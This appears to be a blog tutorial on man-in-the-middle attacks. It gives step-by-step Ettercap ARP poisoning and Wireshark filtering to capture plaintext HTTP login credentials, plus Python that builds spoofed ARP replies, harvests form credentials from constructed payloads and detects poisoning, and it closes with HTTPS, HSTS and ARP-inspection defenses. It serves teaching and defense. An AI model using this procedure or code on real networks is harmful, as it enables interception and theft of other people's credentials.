Man In The Middle Attack

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhShUSk2mYXSKlSiGHY0R2uxvMG7kRN1013WuKx1iPJ5Q_H-kS1B3piWGN1GDiRqdjU6EfzMIwdLAz2OhxRbS-G9aaKk159UzwcYwVi1rdmwJiobMprw-XUk3dZ1zM8cUA9khekBs0CuvU/s400/man-in-the-middle.jpg

A man in the middle attack is usually used to capture packets that carry sensitive data such as usernames and passwords. An attacker using this technique has to be on the same local network (the same Layer 2 segment) as the victims, because the technique relies on ARP, which never crosses a router. The man in the middle attack is built on ARP Spoofing / Poisoning, which I already explained in my post. ARP spoofing rewrites the victims' ARP tables so that the attacker's MAC address is recorded as the gateway. In other words, every packet passes through the attacker's PC before going on to its "real" destination; the attacker forwards it, so the victim still gets a working connection and notices nothing.

This time I'm explaining this technique for penetration testing only: to find vulnerabilities in your own web application and to test your own network's security. First, you need two applications:

  1. Ettercap (For windows, For Linux)
  2. Wireshark (link)
After both applications are installed on your PC, follow these steps:
1. Connect to your network and make sure your IP address is in the same subnet as the target's IP address. NB: it won't work on a network with a /32 prefix (subnet mask 255.255.255.255), because there are no other hosts in that subnet to poison: your traffic is routed, not resolved with ARP.
2. Open Ettercap and start unified sniffing (one network interface, any number of targets) or bridged sniffing (two interfaces, with your PC placed in-line between them). I suggest unified sniffing because it is more flexible for choosing the targets. After that choose your network interface.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSRC8m57sbCabWMISpWgh7xjlw-KJPgrlRhsAbm0kSaWg0Q-d28czoRvg1x2fzUoqGXriCP62vEyrdT8N082XWFyyLutQ0JQEo5d70pyvdFtASmrzObXs6zcksEvNXnbfKI_Kv52LvfLo/s400/ettercap-step1.jpg
3. Go to Hosts and choose Scan for hosts. Then choose your targets: add the gateway's IP address as Target 1 and the victim hosts as Target 2. If you leave both target lists empty, Ettercap poisons every host it found, which is noisy and can disrupt the whole segment.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEU1Bi3cvy4pKPqGX99sXrCNpakaWCoVIEEBSBaxI5NuL2foSzywe_79TCmheIk96ysXu6mSVirYpvc_jQV9Tvj4Zvb5ZS9Ykj_KPxnch-Q-KtYgumOioTR-CZJWLuUR9Q_2DqRqSgqQ/s400/ettercap-step2.jpg
4. Go to Mitm on the menu bar and choose ARP poisoning; tick "Sniff remote connections" so that traffic between the victims and the gateway (not only traffic between the victims themselves) is intercepted. After that minimize Ettercap.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4E1WNSjHmxbXqgGD1z7QKWpfL9ENcwqMQSXvP8ajk1_k1ux4fwVIeoBkBVAhcUbk25_3Ijk8NWAbI6-IU6g_GCQqtOAX_CtQePujNDfVp_-ORFTWA_wLW2i751Qhd5uDEZgBofYk_J7g/s400/ettercap-step3.png

5. Open Wireshark and choose your network interface, then click Start.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP_14TqG-XfFFP53kXCryEdGfugRsNvQ0sR6xmRQtrhu1org3FHld0fMjHSKlU1oknc-iJxChZv04vQwF-eMlcEIRxirVWN6HggB7Y2is4M3i1251XgThrTL9pwdDd1DC8YycsYGZPCjg/s400/wireshark-main.JPG
6. In this implementation I'm capturing the username and password that a user sends from the login page of an HTML / PHP web application over plain HTTP (unencrypted, on TCP port 80).
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK9qxR2OqPyuKDi5fs5AlYtEz5ciKl257IcX7qaE6_c-WzUzsBM6FlaPb1ourNpP-rY7yuIzQ5cQYuFRWdWiVy0fxOu_E9Yvqf5rScP4Kh1LAygNQdhCGurV23IYB0EKae3T3M0Zn67rY/s400/login1.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTYtzkuOErgojquolgD61c4h1qPhAXbWvEg1qtBwxzR0mXxACRoYZZrwFEaBy5ww8_XqqpNjZRZaRr4oVdiawOJtHNSZ18l7TMGuKIS2TKJI1CEbj1HS0xqvfoXB8r5SGts1Np-_MWVtk/s400/login2.jpg

7. In this scenario you will get thousands of captured packets. When you think you have enough, click the red Stop button at the top. Then type "http" in the display filter to show only HTTP packets (or http.request.method == "POST" to show only form submissions). Find the POST in the packet list and click it, then expand "HTML Form URL Encoded" in the packet details pane: the username and password are there in clear text, exactly as the browser sent them.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiouUvrhCPiXNXBtt9_ieTiK5Mq24q9FeBxaKUWJUSGhndxAKj32K9K0jik2FAnGc4CFoBVmxh1FqdJTDAnrQpTMXmZbDTeEfxbgzzsERBYStoXeLJGB5ydtfMFp3FH0NqNCsoVsVcyg2Q/s400/wireshark.jpg
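The step above relies on Wireshark's dissector doing the work. To make clear how little the attacker has to do once the packets are flowing through his PC, here is the same filtering and decoding done by hand in Python. This is an added example, not code from the original post or from Wireshark; the two payloads, the host 192.168.1.10, the path /login.php and the field names username/password are constructed for illustration, and nothing here touches the network.

```python
"""Pull form credentials out of captured plaintext HTTP, which is what
Wireshark's "HTML Form URL Encoded" dissector shows in step 7.

Added example; not code from the original post or from Wireshark. The
payloads, host, path and field names below are constructed for illustration.
"""
from urllib.parse import parse_qs

# Constructed TCP payloads as a sniffer on the poisoned segment sees them:
# a GET for the login page, then the POST that submits the form over HTTP.
CAPTURED_PAYLOADS = [
    b"GET /login.php HTTP/1.1\r\nHost: 192.168.1.10\r\n\r\n",
    (b"POST /login.php HTTP/1.1\r\n"
     b"Host: 192.168.1.10\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n"
     b"Content-Length: 33\r\n"
     b"\r\n"
     b"username=alice&password=s3cret%21"),
]


def parse_http_request(payload: bytes):
    """Split a raw HTTP/1.x request into method, path, headers and body.
    Returns None when the payload is not a complete HTTP request."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    request_line = lines[0].split(b" ")
    if len(request_line) != 3 or not request_line[2].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    try:
        length = int(headers.get("content-length", len(body)))
    except ValueError:
        return None
    return {
        "method": request_line[0].decode("latin-1"),
        "path": request_line[1].decode("latin-1"),
        "headers": headers,
        "body": body[:length],
    }


def extract_form_credentials(payload: bytes, fields=("username", "password")):
    """Return the named form fields from a POST with a URL-encoded body,
    or None if the payload is anything else (GET, JSON, not HTTP, ...)."""
    req = parse_http_request(payload)
    if req is None or req["method"] != "POST":
        return None
    if not req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    # parse_qs undoes the percent-encoding, so "s3cret%21" becomes "s3cret!"
    form = parse_qs(req["body"].decode("latin-1"), keep_blank_values=True)
    found = {name: form[name][0] for name in fields if name in form}
    return found or None


def harvest(payloads):
    """Apply the POST filter to every payload, like the Wireshark display
    filter http.request.method == "POST" followed by the form dissector."""
    results = []
    for payload in payloads:
        creds = extract_form_credentials(payload)
        if creds:
            results.append(creds)
    return results


if __name__ == "__main__":
    for creds in harvest(CAPTURED_PAYLOADS):
        print(creds)
```

The only "protection" the browser applied to the password was percent-encoding, which is a transport format and not a secret; any sniffer on the path can reverse it. Had the form been submitted over HTTPS, the sniffer would have seen a TLS record instead of this request, and there would be nothing to parse.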


Conclusion

The man in the middle attack is effective against web applications that use plain HTTP on networks with weak security, because the attacker can read every unencrypted packet, including the ones carrying usernames and passwords. The core of the attack is ARP poisoning/spoofing: with it the attacker acts as a "fake" gateway and sees all the traffic between the poisoned hosts and the real gateway.

To prevent it, as a user, make sure you are accessing the right web application over SSL/TLS (HTTPS) and do not click through certificate warnings, since a certificate error on a site that normally works is exactly what an active interceptor looks like. As a programmer, serve the whole application over HTTPS, including the login page itself and not only the POST target, ideally with HSTS so browsers refuse to fall back to HTTP. Hashing passwords on the server (with a salted, slow hash such as bcrypt rather than plain SHA-1) protects the stored passwords if your database leaks, but it does nothing against this attack: the password is captured in the POST before your code ever hashes it. As a network administrator, you should read my last post; static ARP entries for the gateway on important hosts, and Dynamic ARP Inspection on managed switches, both stop the spoofed replies from being accepted.
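Two things on this page are easier to see in code than in screenshots: what the ARP poisoning of step 4 actually puts on the wire (the "core of the attack" described at the top of the post), and what a network administrator can watch for. The block below builds the pair of spoofed ARP replies that turn the attacker into the "fake" gateway, parses them back, and runs a small monitor over the same frames that flags an IP address whose MAC suddenly changes. It is an added example, not code from the original post or from Ettercap; all MAC and IP addresses are constructed, and the frames are only built in memory (sending them would need raw sockets and root).

```python
"""Build the spoofed ARP replies that ARP poisoning sends, and detect them.

Added example, not code from the original post or from Ettercap. Addresses
are constructed for illustration. Building the frames shows what step 4 does
on the wire; ArpMonitor is what a network administrator's sensor would run
on the same ARP traffic (for example, fed from a pcap).
"""
import struct
from ipaddress import IPv4Address

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying an ARP reply "sender_ip is at sender_mac",
    unicast to target_mac. A poisoner sets sender_ip to an IP it does not own."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    # hardware type 1 (Ethernet), protocol 0x0800 (IPv4), address lengths 6 and 4
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None
    if the frame is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    hw, proto, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (hw, proto, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    a = frame[22:42]
    return (op, mac_str(a[0:6]), str(IPv4Address(a[6:10])),
            mac_str(a[10:16]), str(IPv4Address(a[16:20])))


def poison_frames(attacker_mac, gateway_ip, gateway_mac, victim_ip, victim_mac):
    """The pair of replies that ARP poisoning sends: the victim is told the
    gateway lives at the attacker's MAC, and the gateway is told the victim
    does. Both directions then flow through the attacker, who forwards them."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


class ArpMonitor:
    """Track the IP -> MAC binding announced by each ARP reply and report any
    IP whose MAC differs from the one first seen (the poisoning signature)."""

    def __init__(self):
        self.bindings = {}
        self.alerts = []

    def observe(self, frame: bytes):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.bindings.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            alert = f"{sender_ip} changed from {known} to {sender_mac}"
            self.alerts.append(alert)
            return alert
        return None


if __name__ == "__main__":
    # Constructed addresses: gateway .1, victim .20, attacker with its own MAC.
    monitor = ArpMonitor()
    monitor.observe(build_arp_reply("00:11:22:33:44:01", "192.168.1.1", "00:11:22:33:44:20", "192.168.1.20"))
    monitor.observe(build_arp_reply("00:11:22:33:44:20", "192.168.1.20", "00:11:22:33:44:01", "192.168.1.1"))
    for frame in poison_frames("aa:bb:cc:dd:ee:01", "192.168.1.1", "00:11:22:33:44:01",
                               "192.168.1.20", "00:11:22:33:44:20"):
        print(parse_arp(frame), "->", monitor.observe(frame))
```

The monitor keeps the first MAC it sees for each IP, so it must learn the network while it is clean; a host whose NIC is legitimately replaced, or an address handed to a different machine by DHCP, will also trip it. Those are the false positives a real sensor (arpwatch, or a switch with Dynamic ARP Inspection checking against the DHCP lease table) deals with, and they are why the check is a warning to investigate rather than proof of an attack.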
